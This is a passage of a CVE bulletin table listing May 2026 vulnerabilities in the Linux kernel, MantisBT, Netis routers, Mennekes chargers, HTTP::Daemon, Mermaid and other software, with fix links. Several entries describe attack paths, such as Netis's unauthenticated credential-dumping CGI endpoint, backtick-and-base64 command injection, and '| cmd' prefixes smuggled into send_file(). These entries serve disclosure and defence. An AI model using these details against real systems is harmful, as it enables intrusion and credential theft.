[3] had rmdir(2) sleep in TASK_UNINTERRUPTIBLE for them; [4] fixed the wait's condition; [5] made nr_dying_subsys_* visible synchronously. The cgroup_drain_dying() wait in [3] turned out to be a dead end. When the rmdir caller is also the reaper of a zombie that pins a pidns teardown (e.g. host PID 1 systemd reaping orphan pids that were re-parented to it during the same teardown), rmdir blocks in TASK_UNINTERRUPTIBLE waiting for those pids to free, the pids can't free because PID 1 is the reaper and it's stuck in rmdir, and the system A-A deadlocks. No internal lock ordering breaks this; the wait itself is the bug. The css killing side that drove the original reorder, however, can be made cleanly asynchronous: ->css_offline() is already async, run from css_killed_work_fn() driven by percpu_ref_kill_and_confirm(). The fix is to make that chain start only after all tasks have left the cgroup. rmdir's user-visible side then returns as soon as cgroup.procs and friends are empty, while ->css_offline() still runs only after the cgroup is fully drained. Verified by the original reproducer (pidns teardown + zombie reaper, runs under vng) which hangs vanilla and succeeds here, and by per-commit deterministic repros for [2], [3], [4], [5] with a boot parameter that widens the post-exit_signals() window so each state is reliably reachable. Some stress tests on top of that. cgroup_apply_control_disable() has the same shape of pre-existing race: when a controller is disabled via subtree_control, kill_css() ran synchronously while tasks past exit_signals() could still be linked to the cgroup's csets, and ->css_offline() could fire before they drained. This patch preserves the existing synchronous behavior at that call site (kill_css_sync() + kill_css_finish() back-to-back) and a follow-up patch will defer kill_css_finish() there using a per-css trigger. This seems like the right approach and I don't see problems with it. The changes are somewhat invasive but not excessively so, so backporting to -stable should be okay. If something does turn out to be wrong, the fallback is to revert the entire chain ([1]-[5]) and rework in the development branch instead. v2: Pin cgrp across the deferred destroy work with explicit cgroup_get()/cgroup_put() around queue_work() and the work_fn. v1 wasn't actually broken (ordered cgroup_offline_wq + queue_work order in cgroup_task_dead() saved it) but the explicit ref removes the dependency on those non-obvious invariants. Also note the pre-existing cgroup_apply_control_disable() race in the description; a follow-up will defer kill_css_finish() there. | 2026-05-28 | not yet calculated | CVE-2026-46223 | https://git.kernel.org/stable/c/33fa2e6b1507a0a377a151a8826438bedad1d0b0 https://git.kernel.org/stable/c/93618edf753838a727dbff63c7c291dee22d656b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix bo leak in xe_dma_buf_init_obj() on allocation failure When drm_gpuvm_resv_object_alloc() fails, the pre-allocated storage bo is not freed. Add xe_bo_free(storage) before returning the error. xe_dma_buf_init_obj() calls xe_bo_init_locked(), which frees the bo on error. Therefore, xe_dma_buf_init_obj() must also free the bo on its own error paths. Otherwise, since xe_gem_prime_import() cannot distinguish whether the failure originated from xe_dma_buf_init_obj() or from xe_bo_init_locked(), it cannot safely decide whether the bo should be freed. Add comments documenting the ownership semantics: on success, ownership of storage is transferred to the returned drm_gem_object; on failure, storage is freed before returning. v2: Add comments to explain the free logic. (cherry picked from commit 78a6c5f899f22338bbf48b44fb8950409c5a69b9) | 2026-05-28 | not yet calculated | CVE-2026-46224 | https://git.kernel.org/stable/c/f9ad21b90162baf1d78f8036ff3813c3ec1ac88e https://git.kernel.org/stable/c/8fa8c2a22585fcb31dc605b91a67bbcca223fdd7 https://git.kernel.org/stable/c/93a528f67ce5095bcab46a69839eca97f43dd352 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: rspi: fix controller deregistration Make sure to deregister the controller before releasing underlying resources like DMA during driver unbind. | 2026-05-28 | not yet calculated | CVE-2026-46225 | https://git.kernel.org/stable/c/77defd64b405b680db73d767313fce770d368368 https://git.kernel.org/stable/c/c5090db1b31de3ef4db0cda7e822ab49cb572292 https://git.kernel.org/stable/c/aee76c1dd189562c6678313caec12761f78a9ef3 https://git.kernel.org/stable/c/fee6abd9845c3edd217b0e429d09f764f9a5690e https://git.kernel.org/stable/c/9944fa6726afb1e6eb7e2212764e7da0c97f2dcc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: fsl: fix controller deregistration Make sure to deregister the controller before releasing underlying resources like DMA during driver unbind. | 2026-05-28 | not yet calculated | CVE-2026-46226 | https://git.kernel.org/stable/c/562d954a144950ec2aa6a874ae657cb3fa31fe53 https://git.kernel.org/stable/c/e888308222375ac28bae69134dae288178718a96 https://git.kernel.org/stable/c/ca3195c7b88362d7c81efe685948663a9f9db0e6 https://git.kernel.org/stable/c/5750743a39c9d46ac9fcf57ffe000956da4942cf https://git.kernel.org/stable/c/9b7abfed4c3754062d1f3ffd452e65a38667f586 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: ch341: fix devres lifetime USB drivers bind to USB interfaces and any device managed resources should have their lifetime tied to the interface rather than parent USB device. This avoids issues like memory leaks when drivers are unbound without their devices being physically disconnected (e.g. on probe deferral or configuration changes). Fix the controller and driver data lifetime so that they are released on driver unbind. Note that this also makes sure that the SPI controller is placed correctly under the USB interface in the device tree. | 2026-05-28 | not yet calculated | CVE-2026-46228 | https://git.kernel.org/stable/c/4422fc2411cbbdf5104a914e0596bb483faea254 https://git.kernel.org/stable/c/108a64b27a52f781c4f3751641e3dd65c7dd2fb5 https://git.kernel.org/stable/c/abe572f630bc1f0e77041012ab075869036ede4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Clear VRAM on allocation to prevent stale data exposure KFD VRAM allocations set AMDGPU_GEM_CREATE_VRAM_WIPE_ON_RELEASE but not AMDGPU_GEM_CREATE_VRAM_CLEARED, leaving freshly allocated VRAM with stale data from prior use observable by compute kernels. The GEM ioctl path already sets VRAM_CLEARED for all userspace allocations via amdgpu_gem_create_ioctl() and amdgpu_mode_dumb_create(). The KFD path was missing this flag, allowing stale page table remnants to leak into user buffers. This causes crashes in RCCL P2P transport where non-zero data in ptrExchange/head/tail fields corrupts the protocol handshake. | 2026-05-28 | not yet calculated | CVE-2026-46229 | https://git.kernel.org/stable/c/1db431380879fd9d28b763a88a0c0431be5be8df https://git.kernel.org/stable/c/32b153658f017ad2f5bf8aab479e8d16ac95bc3a https://git.kernel.org/stable/c/77d0b5d11387071770246fd0185a69fa28e8e109 https://git.kernel.org/stable/c/047d44d8d29a6a1a5757256837aa9dd78e3cd0b5 https://git.kernel.org/stable/c/ad52d61d82181dbdb7f05826de38352d5e550cc2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: bla: put backbone reference on failed claim hash insert When batadv_bla_add_claim() fails to insert a new claim into the hash, it leaked a reference to the backbone_gw for which the claim was intended. Call batadv_backbone_gw_put() on the error path to release the reference and avoid leaking the backbone_gw object. | 2026-05-28 | not yet calculated | CVE-2026-46231 | https://git.kernel.org/stable/c/65419eb4259a26a3cd3f56fa0e3b3c113bf8c256 https://git.kernel.org/stable/c/fd0ca034c1e71ca7613cde9dd892836b2c2831bd https://git.kernel.org/stable/c/0baf4b659cdc7305cf685b5a5d60f9e3816ab5d0 https://git.kernel.org/stable/c/7cccf4eb4f96d3c3af91a00b7a9caa652439542e https://git.kernel.org/stable/c/ba9d20ee9076dac32c371116bacbe72480eb356c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: bla: only purge non-released claims When batadv_bla_purge_claims() goes through the list of claims, it is only traversing the hash list with an rcu_read_lock(). Due to a potential parallel batadv_claim_put(), it can happen that it encounters a claim which was actually in the process of being released+freed by batadv_claim_release(). In this case, backbone_gw is set to NULL before the delayed RCU kfree is started. Calling batadv_bla_claim_get_backbone_gw() is then no longer allowed because it would cause a NULL-ptr derefence. To avoid this, only claims with a valid reference counter must be purged. All others are already taken care of. | 2026-05-28 | not yet calculated | CVE-2026-46233 | https://git.kernel.org/stable/c/7b8fbcee3184d848b5aee085ca16d0cf05c9b641 https://git.kernel.org/stable/c/7b7ebb7222a5524ce58e48cc9c6d688320ea6cfe https://git.kernel.org/stable/c/b65365d2b1e6095c538d49baeb140dd1c166c1b3 https://git.kernel.org/stable/c/ab3dbd07a809a8eb30c7ddfab9ac886ed30dce8d https://git.kernel.org/stable/c/cf6b604011591865ae39ac82de8978c1120d17af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock: fix buffer size clamping order In vsock_update_buffer_size(), the buffer size was being clamped to the maximum first, and then to the minimum. If a user sets a minimum buffer size larger than the maximum, the minimum check overrides the maximum check, inverting the constraint. This breaks the intended socket memory boundaries by allowing the vsk->buffer_size to grow beyond the configured vsk->buffer_max_size. Fix this by checking the minimum first, and then the maximum. This ensures the buffer size never exceeds the buffer_max_size. | 2026-05-28 | not yet calculated | CVE-2026-46234 | https://git.kernel.org/stable/c/a998a7e250bf976539e05a00ec64a81292afecaa https://git.kernel.org/stable/c/310da27932dd0afe7ce7456dfe1f0814c3301f41 https://git.kernel.org/stable/c/2602f7bb5818e92315feeaeb71d8ce4d5c9ab160 https://git.kernel.org/stable/c/0b68881501460c3761f196469e1e503218c5e536 https://git.kernel.org/stable/c/d114bfdc9b76bf93b881e195b7ec957c14227bab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: saa7164: add ioremap return checks and cleanups Add checks for ioremap return values in saa7164_dev_setup(). If ioremap for BAR0 or BAR2 fails, release the already allocated PCI memory regions, remove the device from the global list, decrement the device count, and return -ENODEV. This prevents potential null pointer dereferences and ensures proper cleanup on memory mapping failures. | 2026-05-28 | not yet calculated | CVE-2026-46235 | https://git.kernel.org/stable/c/3ce8f3057c51bb0a66aa3fab0862be74e9f88684 https://git.kernel.org/stable/c/a9b83f46e52cf1239d780920d1a7a3e415f7b5d9 https://git.kernel.org/stable/c/6047dc542fa404b5c187cc2c7906aaaaec6d11ed https://git.kernel.org/stable/c/6c22a6d8e4c1507bba504aeebe80476144a373eb https://git.kernel.org/stable/c/d51c60a498e83c9a79884c8e420f97e3885c9583 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rc: xbox_remote: heed DMA restrictions The buffer for IO must not be part of the device structure because that violates the DMA coherency rules. | 2026-05-28 | not yet calculated | CVE-2026-46236 | https://git.kernel.org/stable/c/0cc9251833bf02c8c7863404157c94dab5928fcf https://git.kernel.org/stable/c/48a668c22e8f92637bc496e84d1cf06900f74a5c https://git.kernel.org/stable/c/63a960b39de9c51f29ca19aa5067934f865c0bc7 https://git.kernel.org/stable/c/0bd8ac88ec5f74cd0f4b8cfc54f4cc0827007249 https://git.kernel.org/stable/c/e280d1e5e3f2595bbb43fe6e1bce00c59a43c0ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c: ov5647: Fix runtime PM refcount leak in s_ctrl Three control cases (AUTOGAIN, EXPOSURE_AUTO, ANALOGUE_GAIN) directly return without calling pm_runtime_put(), causing runtime PM reference count leaks. Change these cases from 'return' to 'ret = ... break' pattern to ensure pm_runtime_put() is always called before function exit. | 2026-05-28 | not yet calculated | CVE-2026-46239 | https://git.kernel.org/stable/c/6b03ecf75bda5900b8e661eb75656f631b598bc2 https://git.kernel.org/stable/c/f11ae9c04f8368a3b5a0280ef595198dace1c983 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: fix use-after-free on registration failure Make sure to disable and free the interrupts in case controller registration fails to avoid a potential use-after-free and resource leak. This issue was flagged by Sashiko when reviewing a controller deregistration fix. | 2026-05-28 | not yet calculated | CVE-2026-46241 | https://git.kernel.org/stable/c/8b49b6aadd0c622ca7d68b4a53ae10362e221cf3 https://git.kernel.org/stable/c/336d9ad7560b3baba17af06727a888040ee93390 https://git.kernel.org/stable/c/5c77f11b9b5f1ad5a704dad875260c44016ede10 https://git.kernel.org/stable/c/f62c060272b9d7423b1650b844e8e4e7b8f9f925 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eventpoll: fix ep_remove struct eventpoll / struct file UAF ep_remove() (via ep_remove_file()) cleared file->f_ep under file->f_lock but then kept using @file inside the critical section (is_file_epoll(), hlist_del_rcu() through the head, spin_unlock). A concurrent __fput() taking the eventpoll_release() fastpath in that window observed the transient NULL, skipped eventpoll_release_file() and ran to f_op->release / file_free(). For the epoll-watches-epoll case, f_op->release is ep_eventpoll_release() -> ep_clear_and_put() -> ep_free(), which kfree()s the watched struct eventpoll. Its embedded ->refs hlist_head is exactly where epi->fllink.pprev points, so the subsequent hlist_del_rcu()'s "*pprev = next" scribbles into freed kmalloc-192 memory. In addition, struct file is SLAB_TYPESAFE_BY_RCU, so the slot backing @file could be recycled by alloc_empty_file() -- reinitializing f_lock and f_ep -- while ep_remove() is still nominally inside that lock. The upshot is an attacker-controllable kmem_cache_free() against the wrong slab cache. Pin @file via epi_fget() at the top of ep_remove() and gate the critical section on the pin succeeding. With the pin held @file cannot reach refcount zero, which holds __fput() off and transitively keeps the watched struct eventpoll alive across the hlist_del_rcu() and the f_lock use, closing both UAFs. If the pin fails @file has already reached refcount zero and its __fput() is in flight. Because we bailed before clearing f_ep, that path takes the eventpoll_release() slow path into eventpoll_release_file() and blocks on ep->mtx until the waiter side's ep_clear_and_put() drops it. The bailed epi's share of ep->refcount stays intact, so the trailing ep_refcount_dec_and_test() in ep_clear_and_put() cannot free the eventpoll out from under eventpoll_release_file(); the orphaned epi is then cleaned up there. A successful pin also proves we are not racing eventpoll_release_file() on this epi, so drop the now-redundant re-check of epi->dying under f_lock. The cheap lockless READ_ONCE(epi->dying) fast-path bailout stays. | 2026-05-30 | not yet calculated | CVE-2026-46242 | https://git.kernel.org/stable/c/ef4ca02e95363e78977ca04340d44fe3b4b2b81f https://git.kernel.org/stable/c/ced39b6a8062bac5c18a1c3df85634107eb8664a https://git.kernel.org/stable/c/a6dc643c69311677c574a0f17a3f4d66a5f3744b |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 1.0.0 to 2.28.1, lack of validation of filter_target parameter on return_dynamic_filters.php (normally used as an AJAX in View Issues Page) allows an attacker to inject arbitrary HTML if the target is a TEXTAREA custom field. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-41897 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j7v9-f46r-2rp4 https://github.com/mantisbt/mantisbt/commit/c885af13f0b8596714ffe11df757c09f35fbd8f4 https://mantisbt.org/bugs/view.php?id=37013 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Prior to 2.28.2, the mc_issue_update() function in MantisBT allows users having update_bug_threshold access (UPDATER, with default settings) to edit, change view state, and modify time tracking on bugnotes belonging to other users - bypassing the default DEVELOPER (level 55) threshold required by the dedicated mc_issue_note_update() function. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-42070 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-pq86-j2c2-47f6 https://github.com/mantisbt/mantisbt/commit/6e58fae4f22efdc3987f903c8ba2611de17a9435 https://mantisbt.org/bugs/view.php?id=37089 https://mantisbt.org/bugs/view.php?id=37093 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 2.23.0 to 2.28.1, a missing authorization check in MantisBT's file visibility function allows any authenticated user (REPORTER+) to download attachments on private bugnotes they should not be able to access, via the REST API endpoint GET /api/rest/issues/{id}/files and SOAP API mc_issue_attachment_get endpoint. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-42071 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-pw5x-2mf9-3xc8 https://github.com/mantisbt/mantisbt/commit/029d9d203d9e4ae96b3e59d552fa7395cc1e5071 https://mantisbt.org/bugs/view.php?id=27039 https://mantisbt.org/bugs/view.php?id=36985 https://mantisbt.org/bugs/view.php?id=37092 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 1.3.0 to 2.28.1, unescaped Project Name allows an attacker that can set it (which typically requires manager or administrator access level) to inject HTML in Move Attachments admin page. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-44655 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-7mqj-8gj2-cg59 https://github.com/mantisbt/mantisbt/commit/5cb4b469295889f5d2b01677c9bf82c143e0fdaa |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Prior to 2.28.2, using show_inline=1 parameter and a valid file_show_inline_token CSRF token on file_download.php, an attacker can execute code by uploading a crafted XHTML attachment referencing a JavaScript attachment. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-44657 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-p6fr-rxq7-xcg8 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/26647b2e68ba30b9d7987d4e03d7a16416684bc2 https://mantisbt.org/bugs/view.php?id=37020 |
| mapfish--mapfish-print | mapfish-print is a component of MapFish for printing templated cartographic maps. From 3.23.0 to before 3.28.28, 3.30.30, 3.31.22, 3.33.14, and 4.0.3, an attacker can execute arbitrary code through the Dynamic table feature without being authenticated. This vulnerability is fixed in 3.28.28, 3.30.30, 3.31.22, 3.33.14, and 4.0.3. | 2026-05-28 | not yet calculated | CVE-2026-44672 | https://github.com/mapfish/mapfish-print/security/advisories/GHSA-q7m6-wpvf-mvwx |
| markmhendrickson--neotoma | Neotoma provides versioned records that persist across agent runs. From 0.6.0 to before 0.11.1, Neotoma can treat public reverse-proxied requests as local when the app receives them over a loopback socket and no Bearer token is present. In affected deployments, the REST auth middleware can resolve unauthenticated requests as the local development user, making the hosted Inspector and related API surface reachable without credentials. This vulnerability is fixed in 0.11.1. | 2026-05-29 | not yet calculated | CVE-2026-45577 | https://github.com/markmhendrickson/neotoma/security/advisories/GHSA-5cvp-p7p4-mcx9 https://github.com/markmhendrickson/neotoma/releases/tag/v0.11.1 |
| Mennekes--Amtron | The Mennekes Amtron series (firmware versions ≤ 5.22.3) is vulnerable to an authentication bypass. An unauthenticated remote attacker can change the password of the user account via a crafted POST request to the /operator/operator endpoint. | 2026-05-28 | not yet calculated | CVE-2026-8979 | https://cyberdanube.com/security-research/multiple-vulnerabilities-in-mennekes-amtron-series/ |
| Mennekes--Amtron | The Mennekes Amtron series (firmware versions ≤ 5.22.3) is vulnerable to privilege escalation. An authenticated low-privileged user can change the passwords of the admin (operator) and manufacturer accounts via crafted POST requests. | 2026-05-28 | not yet calculated | CVE-2026-8980 | https://cyberdanube.com/security-research/multiple-vulnerabilities-in-mennekes-amtron-series/ |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, there is a denial-of-service attack when rendering gantt charts, if they use the excludes attribute to exclude all dates. mermaid.parse is unaffected, unless you then call the ganttDb.getTasks() (which is called when rendering a diagram). This vulnerability is fixed in 10.9.6 and 11.15.0. | 2026-05-29 | not yet calculated | CVE-2026-41150 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6 https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis's & (scope reference) handling. :not(&) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0. | 2026-05-29 | not yet calculated | CVE-2026-41159 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76 https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 |
| MIK--Crypt::ScryptKDF | Crypt::ScryptKDF versions through 0.010 for Perl use an insecure random number source when no CSPRNG module is available. The random_bytes function fell back to the built-in rand() function when none of the Perl modules Crypt::PRNG, Crypt::OpenSSL::Random, Net::SSLeay, Crypt::Random, or Bytes::Random::Secure were available. | 2026-05-26 | not yet calculated | CVE-2026-8647 | https://metacpan.org/release/MIK/Crypt-ScryptKDF-0.011/changes https://metacpan.org/release/MIK/Crypt-ScryptKDF-0.011/diff/MIK/Crypt-ScryptKDF-0.010#lib/Crypt/ScryptKDF.pm |
| MIK--CryptX | CryptX versions before 0.088_001 for Perl have a stack buffer overflow in four AEAD decrypt_verify helpers. The gcm_decrypt_verify, ccm_decrypt_verify, chacha20poly1305_decrypt_verify and eax_decrypt_verify XS routines copied the caller-supplied authentication tag into a fixed 144-byte stack buffer (MAXBLOCKSIZE) without checking the supplied length. A longer tag overwrites the stack past the buffer. Version 0.088 added the clamp to gcm_decrypt_verify, and 0.088_001 added it to the other three. Any caller of an affected helper that forwards an attacker-controlled tag longer than the buffer can trigger the overflow. | 2026-05-28 | not yet calculated | CVE-2026-41565 | https://github.com/DCIT/perl-CryptX/commit/57e69e541b0718ca8724c2f61514322a2d859bc1.patch https://github.com/DCIT/perl-CryptX/commit/7e56347d420aaf43b2ee1586f4a230492ccf1642.patch https://metacpan.org/release/MIK/CryptX-0.088_001 |
| misp--cti-transmute | A stored cross-site scripting (XSS) vulnerability exists in the notification panel of CTI Transmute in versions prior to the patched release. Notification messages containing user-controlled convert names were rendered in the notification bell dropdown using innerHTML without adequate sanitization. An attacker able to create or influence a convert name that is included in a notification could inject arbitrary JavaScript, which would execute in the browser of an authenticated user when they opened the notification panel. Successful exploitation could allow the attacker to perform actions in the victim's session or access information available to the application in the browser context. The issue was remediated by constructing notification elements through DOM methods and assigning notification message content via textContent instead of innerHTML. This vulnerability was only present on a development branch. | 2026-05-28 | not yet calculated | CVE-2026-9806 | https://github.com/MISP/cti-transmute/commit/cf42409badc27b13d9bb644b9175aa7f27e11259 |
| mlflow--mlflow/mlflow | A vulnerability in MLflow versions <=3.10.1.dev0 allows unauthorized access to multipart upload (MPU) endpoints when the `--serve-artifacts` mode is enabled. The authorization logic does not enforce resource-level permission checks for `/mlflow-artifacts/mpu/*` endpoints, enabling attackers to overwrite artifacts belonging to other users. This can lead to unauthorized cross-user writes, model supply chain poisoning, and arbitrary code execution when compromised models are loaded. The issue is resolved in version 3.10.0. | 2026-05-25 | not yet calculated | CVE-2026-2651 | https://huntr.com/bounties/65beb119-d3e0-4e03-af2f-fa98f78f83dc https://github.com/mlflow/mlflow/commit/d7290811d8f3c95366d80109424edc1fb1ad966f |
| Mozilla--Firefox for iOS | Firefox for iOS displayed specially crafted right-to-left (RTL) and internationalized domain names (IDNs) incorrectly in link preview UI surfaces. A crafted RTL hostname could visually reorder portions of the displayed domain, causing attacker-controlled sites to appear as trusted origins. This vulnerability was fixed in Firefox for iOS 151.1. | 2026-05-25 | not yet calculated | CVE-2026-9078 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029371 https://www.mozilla.org/security/advisories/mfsa2026-52/ |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In 0.24.8 and earlier, quic_stream_recv can dereference a null substream pointer when a substream is in reopen state. The code finishes the AIO with error but does not return before locking c->mtx. | 2026-05-29 | not yet calculated | CVE-2026-45151 | https://github.com/nanomq/nanomq/security/advisories/GHSA-9qhf-wgp4-p7w5 |
| NEC Platforms, Ltd.--Aterm MR51FN | An OS Command Injection vulnerability exists in Aterm. If a malicious third person gains administrator access to the product's web console, they may be able to execute arbitrary OS commands via adjacent network. | 2026-05-25 | not yet calculated | CVE-2026-8652 | https://jpn.nec.com/security-info/secinfo/nv26-003_en.html |
| NEC Platforms, Ltd.--Aterm WX1800HP | A cross-site scripting vulnerability exists in Aterm. Arbitrary scripts may be executed in the web browser of a user accessing the web management interface via adjacent network. | 2026-05-25 | not yet calculated | CVE-2026-6059 | https://jpn.nec.com/security-info/secinfo/nv26-002_en.html |
| Netis--AC1200 Router | Netis AC1200 Router NC21 V4.0.1.4296 contains a hard-coded root credential stored in /etc/shadow.sample. The password for the root account is set to the trivially weak value root, allowing an attacker with access to the device to authenticate as root and gain full control of the underlying operating system. | 2026-05-27 | not yet calculated | CVE-2026-36538 | http://netis-system.com https://github.com/sir3ns/cve-disclosure/blob/main/CVE-2026-36538/readme.md |
| Netis--AC1200 Router | Netis AC1200 Router NC21 V4.0.1.4296 exposes a CGI endpoint /cgi-bin/skk_get.cgi that returns the entire router configuration as a JSON response with no authentication required. Any attacker on the LAN can send a single HTTP GET request and instantly retrieve administrator credentials, WiFi passwords, PPPoE credentials, DDNS credentials, and a full map of all connected devices. | 2026-05-27 | not yet calculated | CVE-2026-36539 | https://github.com/sir3ns/cve-disclosure/blob/main/CVE-2026-36539/readme.md |
| Netis--AC1200 Router | Netis AC1200 Router NC21 V4.0.1.4296 is vulnerable to unauthenticated command injection via the /cgi-bin/skk_set.cgi endpoint. The password and new_pwd_confirm POST parameters are passed directly to the underlying OS shell without sanitization. An attacker can inject arbitrary shell commands by wrapping them in backticks (`) and encoding them in base64. Because the endpoint requires no authentication, any device on the LAN can achieve full Remote Code Execution on the router's operating system with a single HTTP POST request. | 2026-05-27 | not yet calculated | CVE-2026-36540 | http://netis-system.com https://github.com/sir3ns/cve-disclosure/blob/main/CVE-2026-36540/readme.md |
| NEZUMI--Text::LineFold | Text::LineFold versions through 2019.001 for Perl duplicate the output based on the number of special break characters. Text::LineFold splits the input string by specific line break characters (such as VT, FF and others) into segments, but applies the break function to the entire string, not just the segment. A side effect of this is that the full input can be duplicated for each segment. Besides being incorrect, this can lead to unexpected resource consumption and possible denial of service. Note that Text::LineFold is part of the Unicode-LineBreak distribution, which may have a higher version number than the module. | 2026-05-30 | not yet calculated | CVE-2026-8594 | https://metacpan.org/release/NEZUMI/Unicode-LineBreak-2019.001/source/lib/Text/LineFold.pm#L407-415 https://security.metacpan.org/patches/U/Unicode-LineBreak/2019.001/CVE-2026-8594-r1.patch https://github.com/hatukanezumi/Unicode-LineBreak/pull/6 |
| Northern.Tech--Mender Client 5 | Northern.tech Mender Client 5 before 5.0.4 allows a Cryptographic signature verification bypass. | 2026-05-27 | not yet calculated | CVE-2025-67903 | https://northern.tech https://mender.io/blog/cve-2025-67903-signature-verification-bypass-in-mender-client |
| Northern.Tech--Mender Enterprise | Northern.tech Mender Enterprise Server before 4.1.1 has Incorrect Access Control. | 2026-05-27 | not yet calculated | CVE-2026-33552 | https://Northern.tech https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server |
| Northern.Tech--Mender Server | Northern.tech Mender Server v4.1.0, v4.0.1 and below, and fixed in v4.1.1 and v4.0.2 allows Directory Traversal. | 2026-05-27 | not yet calculated | CVE-2026-49009 | https://northern.tech https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server |
| nrwl--nx-console | Nx Console is the user interface for Nx & Lerna. On 19 May 2026, a malicious version of Nx Console, 18.95.0, was published at 12:30 PM UTC and removed soon after at 12:48 PM UTC, leaving it available for ~18 minutes in Visual Studio Marketplace. For OpenVSX, the problem was detected later, and the compromised version was available from 12:33 UTC to 13:09 UTC (~36 minutes). Version 18.100.0 of Nx Console is not compromised and users may remediate by upgrading to that version. | 2026-05-27 | not yet calculated | CVE-2026-48027 | https://github.com/nrwl/nx-console/security/advisories/GHSA-c9j4-9m59-847w https://github.com/nrwl/nx-console/issues/3139 https://nx.dev/blog/nx-console-v18-95-0-postmortem#indicators-of-compromise https://www.stepsecurity.io/blog/nx-console-vs-code-extension-compromised |
| OALDERS--HTTP::Daemon | HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file(). send_file() opens its string argument with Perl's 2-arg open(). The 2-arg form interprets magic prefixes: '| cmd' and 'cmd |' open a pipe to a subprocess, '> path' and '>> path' open the path for write or append. Untrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form ('cmd |') also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths. | 2026-05-27 | not yet calculated | CVE-2026-8450 | https://github.com/libwww-perl/HTTP-Daemon/pull/89 https://github.com/libwww-perl/HTTP-Daemon/commit/945d35141d94490f749640bd4390acd6a2193995.patch https://metacpan.org/release/OALDERS/HTTP-Daemon-6.17/changes |
| oban-bg--oban_web | Missing Authorization vulnerability in oban-bg oban_web ('Elixir.Oban.Web.Jobs.DetailComponent' modules) allows unauthorized job worker substitution. The handle_event("save-job", ...) handler in 'Elixir.Oban.Web.Jobs.DetailComponent' does not perform an authorization check, unlike the sibling cancel, delete, and retry handlers which all verify the caller's privileges via can?/2. An authenticated user with :read_only access can push a forged save-job LiveView WebSocket event to overwrite a job's worker field with any other existing Oban.Worker module in the application. On the job's next execution attempt, Oban will invoke perform/1 on the attacker-chosen module instead of the intended one. This issue affects oban_web: from 2.12.0 before 2.12.5. | 2026-05-26 | not yet calculated | CVE-2026-48592 | https://github.com/oban-bg/oban_web/security/advisories/GHSA-389x-rgxr-8m33 https://cna.erlef.org/cves/CVE-2026-48592.html https://osv.dev/vulnerability/EEF-CVE-2026-48592 https://github.com/oban-bg/oban_web/commit/ab3c5d1d3eba06c62045f16f2cd7781c7752e248 |
